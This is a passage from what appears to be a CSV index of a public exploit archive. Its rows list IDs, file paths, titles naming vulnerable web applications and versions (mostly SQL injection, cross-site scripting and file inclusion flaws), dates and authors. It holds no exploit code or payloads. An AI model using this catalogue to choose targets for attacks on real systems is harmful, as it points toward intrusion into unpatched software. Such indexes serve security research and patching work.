Scripting",2005-12-23,r0t3d3Vil,cfm,webapps, -40575,exploits/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps, -26987,exploits/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps, -26988,exploits/php/webapps/26988.txt,"Dream4 Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps, -26989,exploits/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps, -26990,exploits/php/webapps/26990.txt,"MyBB 1.0 - 'Globa.php' Cookie Data SQL Injection",2005-12-29,imei,php,webapps, -26991,exploits/asp/webapps/26991.html,"Web Wiz (Multiple Products) - SQL Injection",2005-12-30,DevilBox,asp,webapps, -26992,exploits/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps, -26993,exploits/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps, -26994,exploits/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps, -26995,exploits/php/webapps/26995.txt,"phpDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps, -26998,exploits/php/webapps/26998.txt,"OABoard 1.0 Forum - Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps, -26999,exploits/php/webapps/26999.txt,"PHPBook 1.x - Mail Field PHP Code Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps, -27000,exploits/php/webapps/27000.txt,"VEGO Web Forum 1.x - Theme_ID SQL Injection",2005-12-28,"Aliaksandr Hartsuyeu",php,webapps, -27001,exploits/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps, -27002,exploits/php/webapps/27002.txt,"Jevontech PHPenpals - PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps, -27003,exploits/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps, -27004,exploits/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps, -27633,exploits/php/webapps/27633.txt,"MyBB 1.10 - 'member.php' Cross-Site Scripting",2006-04-12,o.y.6,php,webapps, -27005,exploits/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps, -27006,exploits/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps, -27439,exploits/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps, -27440,exploits/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps, -27441,exploits/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps, -27442,exploits/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps, -27009,exploits/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps, -27011,exploits/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps, -27015,exploits/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps, -27016,exploits/php/webapps/27016.txt,"Chimera Web Portal 0.2 - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps, -27017,exploits/php/webapps/27017.txt,"Chimera Web Portal 0.2 - 'linkcategory.php?id' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps, -27018,exploits/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - 'AdminName' SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps, -27019,exploits/php/webapps/27019.txt,"vBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps, -27020,exploits/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps, -27021,exploits/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps, -27022,exploits/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injections",2006-01-03,r0t,php,webapps, -27023,exploits/php/webapps/27023.txt,"INCOGEN Bugport 1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps, -27025,exploits/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,php,webapps, -27027,exploits/php/webapps/27027.txt,"Jax Calendar 1.34 - 'jax_calendar.php' SQL Injection",2005-12-26,r0t3d3Vil,php,webapps, -27028,exploits/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps, -27029,exploits/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - 'Invoices.php' SQL Injection",2005-12-25,r0t3d3Vil,php,webapps, -27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps, -27033,exploits/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps, -27034,exploits/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp?Press_Release_ID' SQL Injection",2006-01-06,Preddy,asp,webapps, -27035,exploits/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp?Service_ID' SQL Injection",2006-01-06,Preddy,asp,webapps, -27036,exploits/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp?Product_ID' SQL Injection",2006-01-06,Preddy,asp,webapps, -27037,exploits/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps, -27038,exploits/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps, -27039,exploits/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps, -27356,exploits/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting",2006-03-04,"Roozbeh Afrasiabi",php,webapps, -27357,exploits/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps, -27358,exploits/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php?page' Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps, -27359,exploits/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - 'dv_gbook.php?f' Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps, -27360,exploits/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps, -27042,exploits/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps, -27048,exploits/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps, -27052,exploits/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps, -27053,exploits/php/webapps/27053.txt,"Venom Board - 'Post.php3' Multiple SQL Injections",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps, -27054,exploits/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps, -27058,exploits/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps, -27059,exploits/php/webapps/27059.txt,"Xoops Pool Module - IMG Tag HTML Injection",2006-01-09,night_warrior771,php,webapps, -27060,exploits/php/webapps/27060.txt,"PHP-Nuke News Submission Story - Text Field Cross-Site Scripting",2006-01-09,night_warrior771,php,webapps, -27061,exploits/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps, -27062,exploits/cgi/webapps/27062.txt,"Hummingbird Collaboration - Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps, -27063,exploits/asp/webapps/27063.txt,"WebWiz Forums - 'Search_form.asp' Cross-Site Scripting",2006-01-10,nukedx,asp,webapps, -27064,exploits/php/webapps/27064.txt,"Orjinweb - 'index.php' Remote File Inclusion",2006-01-10,serxwebun,php,webapps, -27067,exploits/php/webapps/27067.txt,"MyPHPim - 'calendar.php3?cal_id' SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps, -27068,exploits/php/webapps/27068.txt,"MyPHPim - Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps, -27070,exploits/php/webapps/27070.txt,"Interspire TrackPoint NX - 'index.php' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",php,webapps, -27071,exploits/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps, -27075,exploits/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps, -27076,exploits/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 -27077,exploits/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps, -27078,exploits/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - 'Fullview.php' Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps, -27079,exploits/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - 'ForgotPassword.asp' Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps, -27080,exploits/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps, -27081,exploits/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps, -27083,exploits/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps, -27084,exploits/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps, -27085,exploits/php/webapps/27085.txt,"Bit 5 Blog 8.1 - 'addcomment.php' HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps, -27086,exploits/php/webapps/27086.txt,"White Album 2.5 - 'Pictures.php' SQL Injection",2006-01-16,liz0,php,webapps, -27087,exploits/php/webapps/27087.txt,"GeoBlog 1.0 - 'viewcat.php' SQL Injection",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps, -27088,exploits/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps, -27091,exploits/cgi/webapps/27091.txt,"Ultimate Auction 3.67 - ItemList.pl Cross-Site Scripting",2006-01-16,querkopf,cgi,webapps, -27092,exploits/php/webapps/27092.txt,"GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps, -27093,exploits/php/webapps/27093.txt,"EZDatabase 2.1.1 - 'index.php' Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",php,webapps, -27097,exploits/php/webapps/27097.txt,"PHPXplorer 0.9.33 - 'Workspaces.php' Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps, -27098,exploits/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - 'Rkrt_stats.php' Cross-Site Scripting",2006-01-16,Preddy,php,webapps, -27099,exploits/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps, -27100,exploits/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injections",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps, -27102,exploits/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps, -27103,exploits/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps, -27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps, -27105,exploits/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php?Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps, -27106,exploits/php/webapps/27106.txt,"aoblogger 2.3 - 'create.php' Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps, -27107,exploits/php/webapps/27107.txt,"PHPXplorer 0.9.33 - 'action.php' Directory Traversal",2006-01-16,liz0,php,webapps, -27109,exploits/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps, -27110,exploits/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,php,webapps, -27111,exploits/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps, -27112,exploits/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps, -27114,exploits/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps, -27115,exploits/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps, -27116,exploits/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injections",2006-01-23,SAUDI,php,webapps, -27117,exploits/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injections",2006-01-20,imei,php,webapps, -27118,exploits/php/webapps/27118.pl,"RCBlog 1.0.3 - 'index.php' Directory Traversal",2006-01-20,"Aliaksandr Hartsuyeu",php,webapps, -27119,exploits/php/webapps/27119.txt,"e-moBLOG 1.3 - Multiple SQL Injections",2006-01-23,"Aliaksandr Hartsuyeu",php,webapps, -27120,exploits/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - 'post.php' HTML Injection",2006-01-23,"Roozbeh Afrasiabi",php,webapps, -27121,exploits/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection",2006-01-24,"Jesus Olmos Gonzalez",php,webapps, -27122,exploits/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad - 'usercp.php' HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps, -27123,exploits/php/webapps/27123.txt,"PixelPost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps, -27124,exploits/php/webapps/27124.txt,"SleeperChat 0.3f - 'index.php' Cross-Site Scripting",2006-01-24,hackologie,php,webapps, -27125,exploits/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps, -27126,exploits/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps, -27127,exploits/php/webapps/27127.txt,"PMachine ExpressionEngine 1.4.1 - HTTP Referrer HTML Injection",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps, -27128,exploits/php/webapps/27128.txt,"Windu CMS 2.2 - Multiple Vulnerabilities",2013-07-27,LiquidWorm,php,webapps, -27129,exploits/php/webapps/27129.txt,"Easy Blog by JM LLC - Multiple Vulnerabilities",2013-07-27,Sp3ctrecore,php,webapps, -27130,exploits/php/webapps/27130.txt,"Basic Forum by JM LLC - Multiple Vulnerabilities",2013-07-27,Sp3ctrecore,php,webapps, -27134,exploits/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps, -27136,exploits/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps, -27137,exploits/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps, -27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps, -27139,exploits/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps, -27141,exploits/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps, -27142,exploits/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps, -27143,exploits/asp/webapps/27143.txt,"ZixForum 1.12 - 'forum.asp' Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",asp,webapps, -27146,exploits/php/webapps/27146.txt,"sPaiz-Nuke - 'modules.php' Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps, -27147,exploits/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps, -27149,exploits/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps, -27151,exploits/asp/webapps/27151.txt,"Daffodil CRM 1.5 - 'Userlogin.asp' SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps, -27153,exploits/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - 'Clients.php' Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps, -27154,exploits/php/webapps/27154.txt,"Farsinews 2.1 - 'Loginout.php' Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps, -27155,exploits/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps, -27156,exploits/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps, -27157,exploits/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,php,webapps, -27158,exploits/php/webapps/27158.txt,"SPIP 1.8/1.9 - 'index.php3' Cross-Site Scripting",2006-02-01,Siegfried,php,webapps, -27160,exploits/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps, -27161,exploits/asp/webapps/27161.txt,"CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps, -27162,exploits/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps, -27163,exploits/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin - Directory Traversal",2006-02-04,"Timothy D. Morgan",cgi,webapps, -27164,exploits/php/webapps/27164.txt,"UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection",2006-01-29,k-otik,php,webapps, -27165,exploits/php/webapps/27165.txt,"Beehive Forum 0.6.2 - 'index.php' SQL Injection",2005-12-22,trueend5,php,webapps, -27166,exploits/php/webapps/27166.txt,"EyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"James Bercegay",php,webapps, -27167,exploits/php/webapps/27167.txt,"MyBB 1.0.3 - 'moderation.php' SQL Injection",2006-02-07,imei,php,webapps, -27169,exploits/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 - Login SQL Injection",2006-02-08,night_warrior771,asp,webapps, -27170,exploits/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",php,webapps, -27172,exploits/php/webapps/27172.txt,"SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution",2006-02-08,rgod,php,webapps, -27173,exploits/php/webapps/27173.txt,"CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"James Bercegay",php,webapps, -27174,exploits/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,asp,webapps, -27175,exploits/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,php,webapps, -27176,exploits/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps, -27177,exploits/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root",2013-07-28,"Jacob Holcomb",hardware,webapps, -27361,exploits/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps, -27183,exploits/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php?template' Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps, -27184,exploits/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps, -27185,exploits/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps, -27186,exploits/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps, -27187,exploits/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Persistent Cross-Site Scripting",2013-07-29,drone,jsp,webapps, -27188,exploits/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps, -27189,exploits/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps, -27190,exploits/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps, -27192,exploits/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Local File Inclusion",2006-02-11,rgod,php,webapps, -27193,exploits/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Local File Inclusion",2006-02-11,rgod,php,webapps, -27194,exploits/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps, -27195,exploits/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps, -27197,exploits/php/webapps/27197.txt,"ImageVue 0.16.1 - 'dir.php' Folder Permission Disclosure",2006-02-11,zjieb,php,webapps, -27198,exploits/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php?path' Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps, -27199,exploits/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php?bgcol' Cross-Site Scripting",2006-02-11,zjieb,php,webapps, -27200,exploits/php/webapps/27200.txt,"ImageVue 0.16.1 - 'upload.php' Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps, -27201,exploits/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - 'search.php?Q' Cross-Site Scripting",2006-02-12,Kiki,php,webapps, -27202,exploits/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps, -27204,exploits/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps, -27205,exploits/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php?check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps, -27206,exploits/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps, -27207,exploits/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps, -27208,exploits/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps, -27209,exploits/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps, -27213,exploits/php/webapps/27213.txt,"QwikiWiki 1.5 - 'search.php' Cross-Site Scripting",2006-02-14,Citynova,php,webapps, -27214,exploits/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - 'Member_Login.php' SQL Injection",2006-02-14,"Audun Larsen",php,webapps, -27215,exploits/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps, -27216,exploits/php/webapps/27216.txt,"sNews - 'index.php' Multiple SQL Injections",2006-02-14,joffer,php,webapps, -27217,exploits/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27218,exploits/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27219,exploits/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27220,exploits/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27221,exploits/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27222,exploits/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27223,exploits/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27224,exploits/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27225,exploits/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,php,webapps, -27226,exploits/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps, -27227,exploits/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps, -27228,exploits/php/webapps/27228.txt,"Mantis 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-15,"Thomas Waldegger",php,webapps, -27229,exploits/php/webapps/27229.txt,"Mantis 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps, -27230,exploits/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps, -27236,exploits/php/webapps/27236.txt,"MyBB 1.0.3 - 'private.php' Multiple SQL Injections",2006-02-15,imei,php,webapps, -27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps, -27238,exploits/php/webapps/27238.php,"Dreamcost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,php,webapps, -27239,exploits/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injections",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps, -27240,exploits/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - 'Managegroup.php' SQL Injection",2006-02-16,imei,php,webapps, -27242,exploits/php/webapps/27242.txt,"MyBB 1.0.3 - 'Managegroup.php' Cross-Site 